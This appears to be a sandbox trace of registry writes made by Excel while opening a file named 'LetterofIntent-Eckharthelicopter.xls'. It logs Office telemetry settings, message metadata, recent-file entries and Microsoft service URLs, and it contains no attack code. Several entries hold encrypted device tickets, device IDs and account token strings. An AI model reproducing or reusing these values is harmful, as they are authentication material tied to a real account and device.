HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|14
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|5
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_InAppPurchase_Win32
MaxWait
2000
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\2629F457
2629F457
04000000E41100003B00000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C004C00650074007400650072006F00660049006E00740065006E0074002D00450063006B006800610072007400680065006C00690063006F0070007400650072002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C000100000000000000E06D65C5FC61D60157F4292657F4292600000000E0020000001800000000000000000000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ExdCache\Excel8.0
MSComctlLib
1
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasLocalSaveDocument_Win32
CallDelta
86400
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageData\1:en-US:BizBar
TransactionId
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:BizBar
CallDelta
86400
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasBoot_Win32
MaxWait
2000
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:BizBar
MaxWait
2000
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasOutSpaceSaveAs_Win32
SetUserAction
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU
FOLDERID_Documents
C:\Users\admin\Documents\
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_InAppPurchase_Win32
AppIdOnAction
4294967295
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Place MRU
FOLDERID_Desktop
C:\Users\admin\Desktop\
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageData\1:en-US:Office_InAppPurchase_Win32
TransactionId
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_InAppPurchase_Win32
CallDelta
86400
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasOutSpaceSaveAs_Win32
MessageId
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_InAppPurchase_Win32
TimeToNextcall
2020-07-25T20:55:36Z
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_InAppPurchase_Win32
Provider
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_InAppPurchase_Win32
MessageId
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasOutSpaceSaveAs_Win32
Provider
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasOutSpaceSaveAs_Win32
ShouldShowBadging
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasOutSpaceSaveAs_Win32
MaxWait
2000
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_InAppPurchase_Win32
SetUserAction
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
CachePrefix
Visited:
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasOutSpaceSaveAs_Win32
AppIdOnAction
4294967295
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU
Item 1
[F00000000][T01D661FCC7AB3F30][O00000000]*C:\Users\admin\Desktop\LetterofIntent-Eckharthelicopter.xls
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
CachePrefix
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
CachePrefix
Cookie:
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor
ULSTagIds0
5804129,17846737,18409363,17696988,8758344,17339781,17634580,7668685,18658649,18375312,18948102,7214608,18428691,9319450,17126295,18658648,17322183,18384724,5850062,18658650,18674530,18637650,16920930,20789191,17311449,17698821,18409416,7668686,22131214,18948101,7398615,19978122,20026645,17182941,7668692,18711811,22131171,7440607,19153728,17182981,17182942,4859234,18384801,25514583,17322188,17331930,19543138,5601374,17146274,7668683,5898847,8263521,5850584,17622912,8254547,22070208,23729926,18633496,17182980,8988293,18474530,8697678,17922253,4317338,7649375,17372928,21030619,16859363,6636695,17322181,9176926,17956946,5850122,24466059,8448079,6366290,5850463,6690465,17064074,7649377,5850305,5850582,17425358,19223073,8709129,8750272,18917267,5898845,17182979,6166345,17846738,17885409,17182943,23729931,7459348,17322184,6636694,5850583,22131201,17846749,7218753,8430030,5810308,17182982,18970382,22595280,5850061,5898851,17331926,17331923,7668682,7668681,17846753,17698820,7668693,17331927,17846750,17331929,17127502,6137435,6170083,23459486,17127501,17698822,8988294,17846730,17106064,17698823,17846747,17846734,7398614,18948169,22853700,17110992,17846735,17846748,17846736,19261452,19261450,19261453,19261451,6341763,7116053,6366291,18716634,17610659,18716635,17372899,17914001,17102418,18917269,6029780,8750242,17913997,17913998,17913999,17914000,4289286,7463684,17914002,17914003,22872910,5898849,24466061,17962391,5898880,8433728,5898881,5898884,22929427,8701660,18917328,18917326,18949600,18917268,17578125,18917271,22131169,18917330,18949601,25514584,18970383,22595279,22131208,17322179,18208672,22131207,17127511,22131213,8750241,22853699,5850525,22929425,5587867,23414153,4564173,17127509,16815750,18208656,7690258,8263520,22083550,7690253,22872911,7463105,18647262,19978123,25514585,17962392,5601367,25514582,7966755,6647824,17573643,7868952,17445651,17106059,17445650,17106060,17106065,17106063,19744898,17962113,18625879,36467677,19531353,5601379,7202269,23978014,7168707,6059089,5601366,17110988,8709120,18441314,8747207,17311443,18208657,19174148,22349186,9037324,18633497,17311450,8996805,4859233,17969938,18208715,18208705,18208658,17311446,8709078,8709086,8709089,18621250,8709081,20248016,16860185,8750274,7214607,16843347,17339214,20489431,17618826,18384725,7690256,19744899,19732354,5888003,36467808,19732353,7690254,19543137,18375313,18384802,18647260,18647259,18647261,20026646,7657413,7649378,7657414,17842627,8447777,16815754,18970381,19198081,17045407,17045408,8430031,8254544,6301592,17425365,24131419,17322180,17322182,17322187,22929429,8758345,36292435
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.12026&crev=3
Last
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ETWMonitor\{B866D7AE-7C99-4C20-AA98-278FC044FB98}
Categories
57020000
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ETWMonitor\{F562BB8E-422D-4B5C-B20E-90D710F7D11C}
4
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.12026&crev=3\0
StartDate
A0C23EEBFC61D601
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.12026&crev=3\0
Properties
1
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache
LastClean
905F48EBFC61D601
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe
RulesEndpoint
https://nexusrules.officeapps.live.com/nexus/rules?Application=excel.exe&Version=16.0.12026.20264&ClientId={D61AB268-C26A-439D-BB15-2A0DEDFCA6A3}&OSEnvironment=10&MsoAppId=1&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12026.20264&
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ETWMonitor\{F562BB8E-422D-4B5C-B20E-90D710F7D11C}
Categories
0602000007020000170200000B020000
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor
ULSCategoriesSeverities
827 15,1001 15,2159 10,1000 15,1338 10,1338 50,999 15,226 15,1282 50,1249 10,998 15,1039 15,831 15,1282 10,1249 15,1338 15,1282 15,829 15,1128 15,291 15,850 15,1622 50,828 15,1255 15,830 15,974 15,2159 6,670 15,671 15,1002 15,669 15,70 50,2086 15,2087 15,2088 15,1584 50
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor
ULSTagIds1
19437717,21030738,36274761,21034758,36495773,37889366,17134337,37627806,38355400,595964482,25227928,24404955,23738456,24933761,25227929,23738460,24498243,40921166,592446983,19200034,19200075,19200064,19200076,19200077,19200081,25036313,20312798,19200085,36274758,36274766,36274759,36274767,25228040,36274756,40920586,50890261,19805647,19805655,19805645,23979213,20833951,40920534,23979204,595955846,23979210,595940420,40920576,40921180,36283598,40920410,36283600,50890311,50890144,20039441,50890201,40921312,19952736,36487503,36487509,36487501,36487512,19200142,19252293,19200146,19685471,24404956,24470607,25036314,38040268,38040275,595964481,595952657,595964449,38040273,38040272,595955844,595955845,595955847,595953629,595956366,595956367,595956370,595956364,595939597
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.12026&crev=3\0
EndDate
A082A815C662D601
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified
excel.exe
Fri, 24 Jul 2020 20:56:36 GMT
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\RulesLastAudienceReported
excel.exe
Production
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor
ULSCategoriesSeverities
827 15,1001 15,1000 15,999 15,226 15,1282 50,1338 50,1338 10,1249 10,1039 15,998 15,1282 10,831 15,1249 15,1338 15,1282 15,829 15,1128 15,291 15,1622 50,850 15,828 15,830 15,1255 15,974 15,670 15,671 15,1002 15,669 15,70 50,2086 15,2087 15,2088 15
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Documents
LastPurgeTime
26593736
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common
SessionId
967B24270C88214EB672906428A39DFF
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ETWMonitor\{B866D7AE-7C99-4C20-AA98-278FC044FB98}
4
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.12026&crev=3\0
FilePath
officeclient.microsoft.com\C0E5D08C-4B40-44F8-AC52-044B8C0E498A
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified
excel.exe_queried
054B1B5F00000000
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor
ULSTagIds0
8758344,17134338,34968335,20039442,21378256,19200086,19972417,18409363,40920709,5804129,36487516,36274764,20312793,23979203,18658649,18375312,17634580,17126295,9319450,7214608,18428691,23738461,18948102,21313610,18658648,5850062,18384724,18658650,17650967,21378211,16920930,20789191,18637650,18674530,18405138,41736099,17698821,17650969,17311449,51675359,18409416,23738463,18948101,36517339,17182941,24406167,20026645,19978122,21313507,17376418,18711811,22131171,38040274,19153728,41976736,17182981,20998160,4859234,17182942,36487498,18384801,17146274,19200088,18400093,7692557,19543138,51196380,23738454,38929627,5898847,8263521,17622912,5850584,19182147,8254547,22070208,18633496,23729926,17182980,8988293,19933261,18474530,595964484,20998164,21378246,17922253,4317338,7649375,19182146,34968340,19182148,16859363,6636695,9176926,17956946,18970753,24466059,5850122,6366290,8448079,38013077,5850463,19539223,18400091,7649377,17064074,5850305,5850582,17425358,8709129,19223073,8750272,5898845,18917267,18970755,17182979,17334863,6166345,38062236,17885409,17182943,23729931,7459348,36487502,6636694,5850583,21378252,36274760,7218753,37048725,8430030,36283595,24498246,20998163,5810308,21313503,17182982,18970382,19200082,22595280,21313611,21313506,5850061,5898851,40921045,17698820,17846753,19805648,17846750,18400076,19200087,6137435,25036311,23459486,22623970,6170083,24498245,19200084,595956369,17698822,8988294,37365058,17846730,17106064,17698823,17183040,23979205,18405136,19677907,18948169,17110992,22853700,19261452,135022598,36507861,19261450,25036315,38293842,18401416,36274768,6341763,7116053,21378255,6366291,21561487,17610659,21313504,18970761,38062237,18917269,50890328,19200080,8750242,19693830,4289286,26019932,7463684,18405130,5898849,17962391,24466061,19933262,5898880,5898881,5898884,20312797,22929427,8701660,18917328,36487495,24933760,18917326,25228039,19230863,18949600,40920589,595964483,18917268,17578125,18917271,34198662,20492502,22131169,18917330,18949601,18970383,22595279,22131208,18208672,25036312,22131207,8750241,20770843,22853699,19805646,22853712,5850525,5587867,22929425,23414153,16815750,18208656,34968341,7690258,8263520,7690253,38293841,19200035,7463105,19978123,18647262,21378240,5601367,17962392,7966755,6647824,25036310,17573643,7868952,17445651,17106059,595964451,17445650,19200065,17106060,17106065,36487504,18400083,17106063,19744898,40920708,17962113,18625879,21378247,7202269,23979201,23978014,40921218,18405142,7168707,595956371,5601366,17110988,8709120,18441314,36274757,8747207,17311443,18208657,22349186,18633497,9037324,21378254,17311450,40921221,8996805,4859233,17969938,19182149,18208715,17184068,18208705,37308099,18208658,17311446,18400081,8709078,22074074,8709086,8709089,50890327,36487497,18621250,8709081,20248016,16860185,8750274,7214607,38040271,16843347,17339214,20489431,17618826,17334865,18384725,7690256,19744899,19732354,5888003,595956368,23979200,19732353,7690254,23205313,19543137,18375313,19252294,18384802,18647260,18647259,18647261,20026646,7657413,7649378,7657414,17842627,34968342,8447777,16815754,18970381,19198081,17650971,17045407,18679566,19693829,17045408,595964448,8430031,8254544,34198423,20998158,6301592,17425365,24131419,19677900,40921313,8758345,36292435,17634578,18400089,36761792,50890251,34968338,34968337,34968339,23738455,34968589,36274763,20027008,20027009,23738458,5850306,20979747,21378249,21030802,595955848,19790027,17650968,51196381,5850307,17650970,6366030,21014468,20998161,6366028,41484365,20730712,36517340,20998159,6366025,6366039,50405897,18405147,19200078,18400095,21014467,21014465,23738462,595956365,20998157,18401413,18401414,21313537,18401415,9242009,21313536,21378210,21378243,21378248,21378241,21378253,24470550,36274765,38293833,21378245,5850503,21587081,21587082,24991179,24991180,41158543,51196379,18638031,21313609,17184025,36274762,24511183,17184070,18400075,36487496,18400087,18405132,23738459,19200083,18405134,18405140,18405144,22058587,23643035,20484631,18970757,18970759,18970763,39965824
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.12026&crev=3\0
Url
https://officeclient.microsoft.com/config16/?lcid=1033&syslcid=1033&uilcid=1033&build=16.0.12026&crev=3
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Immersive\production\Property
0018C001283874D9
0100000001000000D08C9DDF0115D1118C7A00C04FC297EB010000004C05B62B45500545AA457E6379A941950000000002000000000010660000000100002000000063C86DE7907E20B0D2731EC6877BB6CD5D7BC9511EA194921F43ECE290BBC0B8000000000E800000000200002000000024FE0871E0B6566C6F6004EC6871E7C4D2D5231524549FE83697133D22258AB480000000626201585D93BCB051841CD26C2590C96DFA1FCE6D0CA635C3A70F415D458AB1C96FD12F6F59D89112899E41B4761DDA6F9289DC24483F2A4829EF8CAEB602136621E957CD71DD2109010CD43694A96FAC08E23EEE576C28D560E5232272E7CF10F14D490AD3ADB7FD82F7DF2B74537C6ECFB394B3753DE67910F6A5E86FBBC7400000008EC13A0DFDD83FD07DAC4CD6D111DE6F7681D2A0765DCEE9E64E26B652261AB45669BAAE218BBF087CA18FD3FBE53F146BA2E392F3BB4DF8D21879CF8A595F59
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935}
ApplicationFlags
1
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935}
DeviceTicket
0100000001000000D08C9DDF0115D1118C7A00C04FC297EB010000004C05B62B45500545AA457E6379A94195000000000200000000001066000000010000200000008E28F806D6AA77283A4BF7B331118090D598CF7F345E6ABA4724DB79071FF892000000000E800000000200002000000047FBBFD9273A74747D7B48D3385169180EFF22566251F3956D33D097B1D60B52F003000084E7F52889EF3ED6744EA117D6BE09A8B0B31DBA6EB5BCF6512858C189D21CA6D1B4BE4CC96F535A3C7B893169E35F0416CCA1E04178A2DAC2672B068CB672D1EB20552B4A6C540572B82E82D03492E9BEF791E6450B97886C552E9D32F8050EA0F6CE1D42F7D6BE845EDB8D4964B7B6430B0C6DC6EF1CA325A9179B8ACA6472104AD767D48600464F8C7A0775C274553D454C0FA3B64BABF68E89C8FFBBDBDB058BC6C6317AD77B0AB9670CE7B9DB2AB4C1DF5D8992FFAAE1C8489DFC2FAF7EA2C502BA419EFF35D6B5616B068EA2BD31E82C1B159DA343B6210B4AB393BDEF7B2C1ECF639A2BE9BDE58FDF0390D2B74D5F00273F7C6B611ACE2DA108E6F852CA6635AA06EB5CA3AF4F9985930047268D0332235D96A365A9C368FA2C735B13ED68D648BA0FAA1ECF6AD974EFC5B6B197585330E9A67F0C6592DB369BAAA2B883360CA6798AF5F207598335433E0A5BA7B14A91B9C83EA6A540AC5ABC4522600723571C3BFBB3F4E34CADB0E20BAC676A713F2CF928D2E119934A85E451AE82CC489AA94AE1BF6D495299F4EFEA1CCFC084741B23DAB71F726B96C84C560CC8B3BEF2E82DB34A8923C69F0492272D3B89948FEDD6668784CA495220E184B7B0502F76AA22A7A5C02D8AD90874023E35E08B466A1238269FABE23CA798905175C9C502D346174877D5687F21E030760ED58FCF8D1047C25841DC001241B1B757CF0C684E071C685A5C2B8A54CD723A6E1147F73EA27FA231C5732B8EBB7DDCB415B9EA235AE98C3AF021C30F15382C84390EE0A97546E46E34954C549A6BF05612CC6D490BA39EFD42199C8BE0793C79C22DC7520825AF59F0F57F566E24765C4024268B8EE41895BA4B4F9067EF43E2CC0E73A2D6F83E0F2E7347158813FB0626FA78E562BD08AE48423902069EA867662438EC0E392F8867E59251FB592BEE7F2980161DED0846F2212C8EEE7B24759B4E3B1F6EA46D05629EBD19DA94F9AD23C43C52D2E027F204AED1466E535A0C9EAF6D49821305C0C6D85130632AB73F420AEBC9E9444905EE841107D66D8546464A7522CBF47CCCFA1B220C8208ED7398F6822F5F791EF263181FB74B559568C53E6A52E1F2EFE1A16D13A25AF6E8215A0F8C237617E30DAF378D783AD6400E4ECFD448665C463C11480183403C04E55F396BCD56318E730027650D32EBA8FE0732AC1AA937186AD39FE798719CFB3366D3019FEA33CD61A85114332C0C316DD6B70C8458F2B235FB909AECB334FD65C8963F5B24E5034D3F7AD136F4BF2460705D898CB0A15E36CA026CCC8785CB7332B133A69D20E39F9A97E14493ADB96A752BF932505339BF1772D7D03D72B3D2F931447F446991ADE31C208B8B93B324041FC5FD9576253EE050D1553A98B90389F1193B76CFF35E0D125F15336EC39D4000000066392F06F7A004F5BE6E34FC72C0BCB1FD0A1F0653C67371DA5E9464EB9892F8988FC49BD450BDBA9468D7D6C920C06AB2702762EA59EFB9A8FF3A807E637130
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935}
DeviceId
0018C001283874D9
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\Volatile
MsaDevice
t=GwAWAbuEBAAUzMHTehVs2ui3xDZ0BSZ6MDJ92usOZgAAEEp3URMdZ39u5f7BD0g2GAbgAD/mY+/2oOHH2gDRadUjooD4jMkUqeQeq8GZEZPL5CGR3gQimO1EsBwR1TehhtH3fE3ZAFkKWlw8I9utU8JwqwNb+FJdIjaNdk8ArcOCgiD5M3ZVTGwbwSZ72OMZ62FwSqS5JXV8cYlT2M+oosFNK3yIioFNLOEPmCkZ5mHv+EN+7HtJ+MXI1o5T3YHTBKUD5kjqRtBOXfFyB3wJ5ujZMUX9wnxZVStSCG6avMnRjC/q4QGgXjaVp7Wdq/BlO2M31FTCwtD6WIbCuiBPIPrT0Y/zKl0Tc15fsN7C0F3/FRkGGgE=&p=
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor
ULSTagIds1
19437717,21030738,36274761,21034758,36495773,37889366,17134337,37627806,595964482,38355400,24404955,25227928,23738456,24933761,25227929,24498243,23738460,40921166,592446983,19200034,19200075,19200064,19200076,19200077,25036313,19200081,20312798,19200085,36274758,36274766,36274759,25228040,36274767,36274756,40920586,50890261,19805647,19805655,19805645,23979213,40920534,20833951,595955846,23979204,595940420,23979210,40920576,40921180,36283598,40920410,36283600,50890311,20039441,50890144,50890201,40921312,19952736,36487503,36487509,36487501,36487512,19200142,19252293,19200146,19685471,24404956,24470607,25036314,38040268,38040275,595964481,595952657,595964449,38040273,38040272,595955844,595955845,595955847,595953629,595956366,595956367,595956370,595956364,595939597
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor
ULSTagIds0
17134338,8758344,34968335,21378256,20039442,40920709,18409363,19972417,19200086,36487516,5804129,20312793,36274764,23979203,18375312,18658649,17634580,17126295,9319450,18428691,7214608,23738461,21313610,18948102,18658648,5850062,18384724,21378211,17650967,18658650,20789191,16920930,18637650,18674530,41736099,18405138,17698821,17650969,17311449,51675359,23738463,18409416,36517339,18948101,24406167,17182941,20026645,19978122,17376418,21313507,22131171,18711811,19153728,38040274,41976736,17182981,20998160,4859234,17182942,18384801,36487498,17146274,7692557,18400093,19200088,19543138,51196380,23738454,38929627,5898847,8263521,5850584,17622912,8254547,19182147,22070208,23729926,18633496,17182980,19933261,8988293,595964484,18474530,20998164,17922253,21378246,4317338,7649375,19182146,34968340,16859363,19182148,6636695,9176926,17956946,5850122,24466059,18970753,8448079,6366290,38013077,5850463,17064074,7649377,18400091,19539223,5850305,5850582,17425358,19223073,8709129,8750272,18917267,5898845,18970755,17182979,6166345,17334863,38062236,17885409,17182943,23729931,7459348,36487502,6636694,5850583,21378252,36274760,7218753,8430030,37048725,24498246,36283595,5810308,20998163,17182982,21313503,18970382,19200082,22595280,21313611,5850061,21313506,5898851,40921045,17846753,17698820,18400076,17846750,19805648,25036311,6137435,19200087,23459486,6170083,22623970,24498245,595956369,19200084,17698822,8988294,37365058,17846730,17106064,17698823,17183040,23979205,18405136,19677907,18948169,22853700,17110992,19261452,36507861,135022598,25036315,19261450,38293842,18401416,36274768,6341763,7116053,21378255,6366291,17610659,21561487,21313504,18970761,18917269,38062237,50890328,8750242,19200080,19693830,26019932,4289286,7463684,18405130,5898849,19933262,24466061,17962391,5898880,5898881,5898884,20312797,22929427,8701660,36487495,18917328,18917326,24933760,25228039,595964483,40920589,18949600,19230863,18917268,17578125,18917271,20492502,34198662,22131169,18917330,18949601,18970383,22595279,22131208,25036312,18208672,22131207,8750241,20770843,22853699,19805646,5850525,22853712,22929425,5587867,23414153,16815750,18208656,7690258,34968341,8263520,38293841,7690253,7463105,19200035,18647262,19978123,21378240,17962392,5601367,7966755,25036310,6647824,17573643,7868952,17445651,595964451,17106059,17445650,17106060,19200065,17106065,36487504,17106063,18400083,40920708,19744898,17962113,18625879,21378247,23979201,7202269,23978014,7168707,18405142,40921218,595956371,5601366,17110988,8709120,18441314,36274757,8747207,17311443,18208657,22349186,9037324,18633497,40921221,17311450,21378254,8996805,4859233,17969938,18208715,19182149,18208705,17184068,37308099,18208658,17311446,8709078,18400081,8709086,22074074,8709089,36487497,50890327,18621250,8709081,20248016,16860185,8750274,38040271,7214607,16843347,17339214,20489431,17618826,17334865,18384725,7690256,19744899,19732354,595956368,5888003,23979200,19732353,7690254,23205313,19543137,19252294,18375313,18384802,18647260,18647259,18647261,20026646,7657413,7649378,7657414,17842627,8447777,34968342,16815754,18970381,19198081,17650971,17045407,19693829,18679566,595964448,17045408,8430031,8254544,6301592,20998158,34198423,17425365,24131419,19677900,40921313,8758345,36292435,17634578,18400089,36761792,50890251,34968338,34968337,34968339,34968589,23738455,36274763,20027008,20027009,5850306,23738458,595955848,21030802,21378249,20979747,17650968,19790027,5850307,51196381,17650970,21014468,6366030,20998161,6366028,20730712,41484365,20998159,36517340,6366025,6366039,50405897,18405147,21014467,18400095,19200078,21014465,595956365,23738462,20998157,18401413,18401414,21313537,18401415,9242009,21313536,21378210,21378243,21378248,21378241,24470550,21378253,38293833,36274765,21378245,5850503,21587081,21587082,24991179,24991180,41158543,51196379,18638031,21313609,17184025,36274762,17184070,24511183,36487496,18400075,18400087,18405132,23738459,18405134,19200083,18405140,18405144,22058587,23643035,20484631,18970757,18970759,18970763,39965824
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor
ULSCategoriesSeverities
827 15,2159 10,1001 15,1000 15,1338 10,1338 50,1282 50,226 15,999 15,1249 10,1039 15,998 15,1282 10,831 15,1249 15,1338 15,1282 15,829 15,1128 15,291 15,1622 50,850 15,828 15,830 15,1255 15,974 15,670 15,2159 6,671 15,1002 15,669 15,70 50,2086 15,2087 15,2088 15,1584 50
4580
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
418A073AA3BC3475
